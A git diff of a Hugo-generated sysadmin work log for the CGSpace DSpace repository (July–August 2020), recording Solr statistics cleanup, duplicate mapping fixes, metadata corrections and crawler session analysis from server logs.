at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
@ -1063,7 +1063,7 @@ If run the update again with the resume option (-r) they will be reattempted
<li>I started the same script for the statistics-2019 core (12 million records&hellip;)</li>
<li>Update an ILRI author&rsquo;s name on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p &#39;fuuu&#39; -f dc.contributor.author -t &#39;correct&#39; -m 3
Fixed 13 occurences of: Muloi, D.
Fixed 4 occurences of: Muloi, D.M.
</code></pre><h2 id="2020-07-28">2020-07-28</h2>
@ -1112,11 +1112,11 @@ Fixed 4 occurences of: Muloi, D.M.
</ul>
<pre tabindex="0"><code># grep -c numeric /usr/share/iso-codes/json/iso_3166-1.json
249
# grep -c -E '&quot;name&quot;:' /usr/share/iso-codes/json/iso_3166-1.json
# grep -c -E &#39;&#34;name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
249
# grep -c -E '&quot;official_name&quot;:' /usr/share/iso-codes/json/iso_3166-1.json
# grep -c -E &#39;&#34;official_name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
173
# grep -c -E '&quot;common_name&quot;:' /usr/share/iso-codes/json/iso_3166-1.json
# grep -c -E &#39;&#34;common_name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
6
</code></pre><ul>
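<li>The same counts are easier with jq, assuming the file&rsquo;s top-level key is <code>3166-1</code> (a sketch):</li>
</ul>
<pre tabindex="0"><code># total entries, then those with a common_name
$ jq &#39;.[&#34;3166-1&#34;] | length&#39; /usr/share/iso-codes/json/iso_3166-1.json
249
$ jq &#39;[.[&#34;3166-1&#34;][] | select(.common_name)] | length&#39; /usr/share/iso-codes/json/iso_3166-1.json
6
</code></pre><ul>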
<li>Wow, the <code>CC-BY-NC-ND-3.0-IGO</code> license that I had <a href="https://github.com/spdx/license-list-XML/issues/767">requested in 2019-02</a> was finally merged into SPDX&hellip;</li>

View File

@ -36,7 +36,7 @@ It is class based so I can easily add support for other vocabularies, and the te
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -150,8 +150,8 @@ It is class based so I can easily add support for other vocabularies, and the te
</li>
<li>I purged all unmigrated stats in a few cores and then restarted processing:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;'
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
</code></pre><ul>
<li>Andrea from Macaroni Bros emailed me a few days ago to say he&rsquo;s having issues with the CGSpace REST API
@ -192,16 +192,16 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:8080/rest/collections/1445' | json_pp | grep numberItems
&quot;numberItems&quot; : 63,
$ http 'http://localhost:8080/rest/collections/1445/items' jq '. | length'
<pre tabindex="0"><code>$ http &#39;http://localhost:8080/rest/collections/1445&#39; | json_pp | grep numberItems
&#34;numberItems&#34; : 63,
$ http &#39;http://localhost:8080/rest/collections/1445/items&#39; jq &#39;. | length&#39;
61
</code></pre><ul>
<li>Also on DSpace Test (which is running DSpace 6!), though the issue is slightly different there:</li>
</ul>
<pre tabindex="0"><code>$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708' | json_pp | grep numberItems
&quot;numberItems&quot; : 61,
$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items' | jq '. | length'
<pre tabindex="0"><code>$ http &#39;https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708&#39; | json_pp | grep numberItems
&#34;numberItems&#34; : 61,
$ http &#39;https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items&#39; | jq &#39;. | length&#39;
59
</code></pre><ul>
<li>Ah! I exported that collection&rsquo;s metadata and checked it in OpenRefine, where I noticed that two items are mapped twice
@ -210,7 +210,7 @@ $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-49
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT * FROM collection2item WHERE item_id = '107687';
<pre tabindex="0"><code>dspace=# SELECT * FROM collection2item WHERE item_id = &#39;107687&#39;;
id | collection_id | item_id
--------+---------------+---------
133698 | 966 | 107687
@ -220,8 +220,8 @@ $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-49
</code></pre><ul>
<li>So for each id you can delete one duplicate mapping:</li>
</ul>
<pre tabindex="0"><code>dspace=# DELETE FROM collection2item WHERE id='134686';
dspace=# DELETE FROM collection2item WHERE id='128819';
<pre tabindex="0"><code>dspace=# DELETE FROM collection2item WHERE id=&#39;134686&#39;;
dspace=# DELETE FROM collection2item WHERE id=&#39;128819&#39;;
</code></pre><ul>
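<li>A more general query to check for any remaining duplicate mappings:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT item_id, collection_id, COUNT(*) FROM collection2item GROUP BY item_id, collection_id HAVING COUNT(*) &gt; 1;
</code></pre><ul>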
<li>Update countries on CGSpace to be closer to ISO 3166-1 with some minor differences based on Peter&rsquo;s preferred display names</li>
</ul>
@ -229,11 +229,11 @@ dspace=# DELETE FROM collection2item WHERE id='128819';
cg.coverage.country,correct
CAPE VERDE,CABO VERDE
COCOS ISLANDS,COCOS (KEELING) ISLANDS
&quot;CONGO, DR&quot;,&quot;CONGO, DEMOCRATIC REPUBLIC OF&quot;
COTE D'IVOIRE,CÔTE D'IVOIRE
&quot;KOREA, REPUBLIC&quot;,&quot;KOREA, REPUBLIC OF&quot;
PALESTINE,&quot;PALESTINE, STATE OF&quot;
$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
&#34;CONGO, DR&#34;,&#34;CONGO, DEMOCRATIC REPUBLIC OF&#34;
COTE D&#39;IVOIRE,CÔTE D&#39;IVOIRE
&#34;KOREA, REPUBLIC&#34;,&#34;KOREA, REPUBLIC OF&#34;
PALESTINE,&#34;PALESTINE, STATE OF&#34;
$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -t &#39;correct&#39; -m 228
</code></pre><ul>
<li>I had to restart Tomcat 7 three times before all the Solr statistics cores came up properly
<ul>
@ -267,7 +267,7 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
</li>
<li>I checked the nginx logs around 5PM yesterday to see who was accessing the server:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '04/Aug/2020:(17|18)' | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#39;04/Aug/2020:(17|18)&#39; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>I see the Macaroni Bros are using their new user agent for harvesting: <code>RTB website BOT</code>
<ul>
@ -276,7 +276,7 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep -E &quot;(63.32.242.35|64.62.202.71)&quot; | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep -E &#34;(63.32.242.35|64.62.202.71)&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
5693
</code></pre><ul>
<li>DSpace itself uses a case-sensitive regex for user agents so there are no hits from those IPs in Solr, but I need to tweak the other regexes so they don&rsquo;t misuse the resources
@ -291,9 +291,9 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
</li>
<li>A few more IPs causing lots of Tomcat sessions yesterday:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &quot;38.128.66.10&quot; | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &#34;38.128.66.10&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
1585
$ cat dspace.log.2020-08-04 | grep &quot;64.62.202.71&quot; | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2020-08-04 | grep &#34;64.62.202.71&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
5691
</code></pre><ul>
<li>38.128.66.10 isn&rsquo;t creating any Solr statistics due to our DSpace agents pattern, but they are creating lots of sessions so perhaps I need to force them to use one session in Tomcat:</li>
@ -318,8 +318,8 @@ Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
</code></pre><ul>
<li>And another IP belonging to Turnitin (the alternate user agent of Turnitinbot):</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &quot;199.47.87.145&quot; | grep -E 'sessi
on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &#34;199.47.87.145&#34; | grep -E &#39;sessi
on_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2777
</code></pre><ul>
<li>I will add <code>Turnitin</code> to the Tomcat Crawler Session Manager Valve regex as well&hellip;</li>
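<li>For reference, that valve lives in Tomcat&rsquo;s server.xml; a minimal sketch (our real <code>crawlerUserAgents</code> regex is longer):</li>
</ul>
<pre tabindex="0"><code>&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
       crawlerUserAgents=&#34;.*[bB]ot.*|.*Turnitin.*&#34; /&gt;
</code></pre>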
@ -377,8 +377,8 @@ on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<ul>
<li>The Atmire stats processing for the statistics-2018 Solr core keeps stopping with this error:</li>
</ul>
<pre tabindex="0"><code>Exception: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
<pre tabindex="0"><code>Exception: 50 consecutive records couldn&#39;t be saved. There&#39;s most likely an issue with the connection to the solr server. Shutting down.
java.lang.RuntimeException: 50 consecutive records couldn&#39;t be saved. There&#39;s most likely an issue with the connection to the solr server. Shutting down.
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.storeOnServer(SourceFile:317)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:177)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
@ -398,71 +398,71 @@ java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's mo
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/[0-9]+/&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/[0-9]+/&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><h2 id="2020-08-09">2020-08-09</h2>
<ul>
<li>The Atmire script did something to the server and created 132GB of log files so the root partition ran out of space&hellip;</li>
<li>I removed the log file and tried to re-run the process but it seems to be looping over 11,000 records and failing, creating millions of lines in the logs again:</li>
</ul>
<pre tabindex="0"><code># grep -oE &quot;Record uid: ([a-f0-9\\-]*){1} couldn't be processed&quot; /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 &gt; /tmp/not-processed-errors.txt
<pre tabindex="0"><code># grep -oE &#34;Record uid: ([a-f0-9\\-]*){1} couldn&#39;t be processed&#34; /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 &gt; /tmp/not-processed-errors.txt
# wc -l /tmp/not-processed-errors.txt
2202973 /tmp/not-processed-errors.txt
# sort /tmp/not-processed-errors.txt | uniq -c | tail -n 10
220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn't be processed
220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn't be processed
220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn't be processed
220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn't be processed
220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn't be processed
221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed
220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn't be processed
220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn't be processed
221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn't be processed
221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn't be processed
220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn&#39;t be processed
220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn&#39;t be processed
220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn&#39;t be processed
220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn&#39;t be processed
220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn&#39;t be processed
221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn&#39;t be processed
220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn&#39;t be processed
220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn&#39;t be processed
221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn&#39;t be processed
221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn&#39;t be processed
</code></pre><ul>
<li>I looked at some of those records and saw strange objects in their <code>containerCommunity</code>, <code>containerCollection</code>, etc&hellip;</li>
</ul>
<pre tabindex="0"><code>{
&quot;responseHeader&quot;: {
&quot;status&quot;: 0,
&quot;QTime&quot;: 0,
&quot;params&quot;: {
&quot;q&quot;: &quot;uid:fff1349d-79d5-4ceb-89a1-ce78107d982d&quot;,
&quot;indent&quot;: &quot;true&quot;,
&quot;wt&quot;: &quot;json&quot;,
&quot;_&quot;: &quot;1596957629970&quot;
&#34;responseHeader&#34;: {
&#34;status&#34;: 0,
&#34;QTime&#34;: 0,
&#34;params&#34;: {
&#34;q&#34;: &#34;uid:fff1349d-79d5-4ceb-89a1-ce78107d982d&#34;,
&#34;indent&#34;: &#34;true&#34;,
&#34;wt&#34;: &#34;json&#34;,
&#34;_&#34;: &#34;1596957629970&#34;
}
},
&quot;response&quot;: {
&quot;numFound&quot;: 1,
&quot;start&quot;: 0,
&quot;docs&quot;: [
&#34;response&#34;: {
&#34;numFound&#34;: 1,
&#34;start&#34;: 0,
&#34;docs&#34;: [
{
&quot;containerCommunity&quot;: [
&quot;155&quot;,
&quot;155&quot;,
&quot;{set=null}&quot;
&#34;containerCommunity&#34;: [
&#34;155&#34;,
&#34;155&#34;,
&#34;{set=null}&#34;
],
&quot;uid&quot;: &quot;fff1349d-79d5-4ceb-89a1-ce78107d982d&quot;,
&quot;containerCollection&quot;: [
&quot;1099&quot;,
&quot;830&quot;,
&quot;{set=830}&quot;
&#34;uid&#34;: &#34;fff1349d-79d5-4ceb-89a1-ce78107d982d&#34;,
&#34;containerCollection&#34;: [
&#34;1099&#34;,
&#34;830&#34;,
&#34;{set=830}&#34;
],
&quot;owningComm&quot;: [
&quot;155&quot;,
&quot;155&quot;,
&quot;{set=null}&quot;
&#34;owningComm&#34;: [
&#34;155&#34;,
&#34;155&#34;,
&#34;{set=null}&#34;
],
&quot;isInternal&quot;: false,
&quot;isBot&quot;: false,
&quot;statistics_type&quot;: &quot;view&quot;,
&quot;time&quot;: &quot;2018-05-08T23:17:00.157Z&quot;,
&quot;owningColl&quot;: [
&quot;1099&quot;,
&quot;830&quot;,
&quot;{set=830}&quot;
&#34;isInternal&#34;: false,
&#34;isBot&#34;: false,
&#34;statistics_type&#34;: &#34;view&#34;,
&#34;time&#34;: &#34;2018-05-08T23:17:00.157Z&#34;,
&#34;owningColl&#34;: [
&#34;1099&#34;,
&#34;830&#34;,
&#34;{set=830}&#34;
],
&quot;_version_&quot;: 1621500445042147300
&#34;_version_&#34;: 1621500445042147300
}
]
}
@ -470,8 +470,8 @@ java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's mo
</code></pre><ul>
<li>I deleted those 11,724 records with the strange &ldquo;set&rdquo; object in the collections and communities, as well as 360,000 records with <code>id: -1</code></li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;'
$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:\-1&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:\-1&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>I was going to compare the CUA stats for 2018 and 2019 on CGSpace and DSpace Test, but after Linode rebooted CGSpace (linode18) for maintenance yesterday the Solr cores didn&rsquo;t all come back up OK
<ul>
@ -487,24 +487,24 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=tru
</ul>
<pre tabindex="0"><code>$ cat 2020-08-09-add-ILRI-orcids.csv
dc.contributor.author,cg.creator.id
&quot;Grace, Delia&quot;,&quot;Delia Grace: 0000-0002-0195-9489&quot;
&quot;Delia Grace&quot;,&quot;Delia Grace: 0000-0002-0195-9489&quot;
&quot;Baker, Derek&quot;,&quot;Derek Baker: 0000-0001-6020-6973&quot;
&quot;Ngan Tran Thi&quot;,&quot;Tran Thi Ngan: 0000-0002-7184-3086&quot;
&quot;Dang Xuan Sinh&quot;,&quot;Sinh Dang-Xuan: 0000-0002-0522-7808&quot;
&quot;Hung Nguyen-Viet&quot;,&quot;Hung Nguyen-Viet: 0000-0001-9877-0596&quot;
&quot;Pham Van Hung&quot;,&quot;Pham Anh Hung: 0000-0001-9366-0259&quot;
&quot;Lindahl, Johanna F.&quot;,&quot;Johanna Lindahl: 0000-0002-1175-0398&quot;
&quot;Teufel, Nils&quot;,&quot;Nils Teufel: 0000-0001-5305-6620&quot;
&quot;Duncan, Alan J.&quot;,&quot;Alan Duncan: 0000-0002-3954-3067&quot;
&quot;Moodley, Arshnee&quot;,&quot;Arshnee Moodley: 0000-0002-6469-3948&quot;
&#34;Grace, Delia&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
&#34;Delia Grace&#34;,&#34;Delia Grace: 0000-0002-0195-9489&#34;
&#34;Baker, Derek&#34;,&#34;Derek Baker: 0000-0001-6020-6973&#34;
&#34;Ngan Tran Thi&#34;,&#34;Tran Thi Ngan: 0000-0002-7184-3086&#34;
&#34;Dang Xuan Sinh&#34;,&#34;Sinh Dang-Xuan: 0000-0002-0522-7808&#34;
&#34;Hung Nguyen-Viet&#34;,&#34;Hung Nguyen-Viet: 0000-0001-9877-0596&#34;
&#34;Pham Van Hung&#34;,&#34;Pham Anh Hung: 0000-0001-9366-0259&#34;
&#34;Lindahl, Johanna F.&#34;,&#34;Johanna Lindahl: 0000-0002-1175-0398&#34;
&#34;Teufel, Nils&#34;,&#34;Nils Teufel: 0000-0001-5305-6620&#34;
&#34;Duncan, Alan J.&#34;,&#34;Alan Duncan: 0000-0002-3954-3067&#34;
&#34;Moodley, Arshnee&#34;,&#34;Arshnee Moodley: 0000-0002-6469-3948&#34;
</code></pre><ul>
<li>That got me curious, so I generated a list of all the unique ORCID identifiers we have in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240) TO /tmp/2020-08-09-orcid-identifiers.csv;
COPY 2095
dspace=# \q
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq &gt; /tmp/2020-08-09-orcid-identifiers-uniq.csv
$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq &gt; /tmp/2020-08-09-orcid-identifiers-uniq.csv
$ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
1949 /tmp/2020-08-09-orcid-identifiers-uniq.csv
</code></pre><ul>
@ -517,9 +517,9 @@ $ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
...
$ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;'
$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;owningColl:/.*set.*/&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>I added <code>Googlebot</code> and <code>Twitterbot</code> to the list of explicitly allowed bots
<ul>
@ -573,7 +573,7 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=tru
<ul>
<li>Last night I started the processing of the statistics-2016 core with the Atmire stats util and I see some errors like this:</li>
</ul>
<pre tabindex="0"><code>Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn't be processed
<pre tabindex="0"><code>Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: f6b288d7-d60d-4df9-b311-1696b88552a0, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
@ -598,8 +598,8 @@ Caused by: java.lang.NullPointerException
</li>
<li>I purged the unmigrated docs and continued processing:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2016/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;'
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2016
</code></pre><ul>
<li>Altmetric asked for a dump of CGSpace&rsquo;s OAI &ldquo;sets&rdquo; so they can update their affiliation mappings
@ -608,8 +608,8 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'https://cgspace.cgiar.org/oai/request?verb=ListSets' &gt; /tmp/0.xml
$ for num in {100..1300..100}; do http &quot;https://cgspace.cgiar.org/oai/request?verb=ListSets&amp;resumptionToken=////$num&quot; &gt; /tmp/$num.xml; sleep 2; done
<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/oai/request?verb=ListSets&#39; &gt; /tmp/0.xml
$ for num in {100..1300..100}; do http &#34;https://cgspace.cgiar.org/oai/request?verb=ListSets&amp;resumptionToken=////$num&#34; &gt; /tmp/$num.xml; sleep 2; done
$ for num in {0..1300..100}; do cat /tmp/$num.xml &gt;&gt; /tmp/cgspace-oai-sets.xml; done
</code></pre><ul>
<li>This produces one file that has all the sets, albeit with 14 pages of responses concatenated into one document, but that&rsquo;s how theirs was in the first place&hellip;</li>
@ -620,9 +620,9 @@ $ for num in {0..1300..100}; do cat /tmp/$num.xml &gt;&gt; /tmp/cgspace-oai-sets
<li>The com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script that was processing 2015 records last night started spitting shit tons of errors and created 120GB of logs&hellip;</li>
<li>I looked at a few of the UIDs that it was having problems with and they were unmigrated ones&hellip; so I purged them in the statistics-2015 core and all the rest of the statistics cores</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2015/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
...
$ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;'
$ curl -s &#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><h2 id="2020-08-19">2020-08-19</h2>
<ul>
<li>I tested the DSpace 5 and DSpace 6 versions of the <a href="https://github.com/ilri/cgspace-java-helpers">country code tagger curation task</a> and noticed a few things
@ -715,17 +715,17 @@ $ curl -s &quot;http://localhost:8081/solr/statistics-2010/update?softCommit=tru
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=0' User-Agent:'curl' &gt; /tmp/wle-trade-off-page1.xml
$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=100' User-Agent:'curl' &gt; /tmp/wle-trade-off-page2.xml
$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=200' User-Agent:'curl' &gt; /tmp/wle-trade-off-page3.xml
<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=0&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page1.xml
$ http &#39;https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&amp;query=trade+off&amp;rpp=100&amp;start=100&#39; User-Agent:&#39;curl&#39; &gt; /tmp/wle-trade-off-page2.xml
